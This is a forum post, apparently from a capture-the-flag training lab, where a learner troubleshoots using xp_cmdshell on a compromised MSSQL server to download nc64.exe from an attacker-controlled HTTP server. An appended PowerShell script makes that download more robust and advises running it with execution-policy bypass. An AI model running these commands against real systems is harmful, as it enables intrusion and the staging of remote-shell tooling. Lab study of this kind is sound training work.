Hi all,
I’m working my way through the tutorials and have run into a problem that I just cannot resolve, including stopping and starting a new box. I am following the tutorial 100%. Here is what I’ve done so far:
- Log into mssql using impacket mssqlclient and the found password → no problem
- Enable xp_cmdshell and test with EXEC xp_cmdshell 'net user'; → no problem
- Start http server (tested also with different ports) in same location as nc64.exe → no problem
- Issue command to change location to Downloads, wget from my server, and copy nc64.exe → here comes the problem. Full command:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.xxx.xxx:8000/nc64.exe -outfile nc64.exe"
As soon as I issue the command, I see a hit on my server: GET /nc64.exe HTTP/1.1" 200 -
But the sql terminal hangs for a while, and then fails with the following error:
wget : The operation has timed out.
At line:1 char:32
+ ... \Downloads; wget http://10.10.14.215:8088/nc64.exe -outfile nc64-2.ex ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
When I do xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
I can see the file created, but with 0 length.
I’ve tried different versions of the same commands from other tutorials, different http ports, I’ve killed and restarted the machine… Nothing I do is making a difference. I’m using Kali Linux.
Really hoping for a pointer in the right direction here.
Many thanks
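The download step described in the post, written out as an added example (this is not code from the original post or from any tutorial): it asks the HTTP server for the file size with a HEAD request, downloads with an explicit timeout instead of the long default, falls back to System.Net.WebClient if Invoke-WebRequest fails, and then compares the bytes on disk against the advertised Content-Length, so a 0-byte or truncated nc64.exe is reported instead of silently left behind. The $Url and $Dest values are placeholders taken from the post, and the server is assumed to be python3 -m http.server (which answers HEAD requests); adjust both to your own setup.

```powershell
# Added example, not from the original post. $Url and $Dest are assumed
# placeholders: the attacker's HTTP server and the target path on the box.
$Url  = 'http://10.10.xxx.xxx:8000/nc64.exe'
$Dest = 'C:\Users\sql_svc\Downloads\nc64.exe'

# Ask the server how large the file should be before transferring it.
# python3 -m http.server answers HEAD with the same Content-Length as GET.
$head     = Invoke-WebRequest -Uri $Url -Method Head -UseBasicParsing -TimeoutSec 20
$expected = [int64]($head.Headers['Content-Length'] | Select-Object -First 1)

# Download with a hard timeout. Without -TimeoutSec the cmdlet waits a long
# time before surfacing "The operation has timed out".
try {
    Invoke-WebRequest -Uri $Url -OutFile $Dest -UseBasicParsing -TimeoutSec 60
} catch {
    # Fallback: WebClient streams straight to disk and does not go through
    # the Invoke-WebRequest response wrapper.
    Write-Warning "Invoke-WebRequest failed: $($_.Exception.Message); retrying with WebClient"
    (New-Object System.Net.WebClient).DownloadFile($Url, $Dest)
}

# A 200 in the server log only means the request arrived; the body can still
# fail to arrive in full. Compare what landed on disk with what was advertised.
$actual = (Get-Item $Dest).Length
if ($actual -ne $expected) {
    throw "Size mismatch: $Dest is $actual bytes, server advertised $expected"
}
$hash = (Get-FileHash -Path $Dest -Algorithm SHA256).Hash
Write-Output "OK: $Dest is $actual bytes, SHA256 $hash"
```

Through xp_cmdshell this is easiest to run as a script rather than a one-liner: host it on the same HTTP server, fetch it first, then call it with powershell -ep bypass -f. Compare the printed SHA256 against sha256sum nc64.exe on the Kali side to confirm the binary is the one you served.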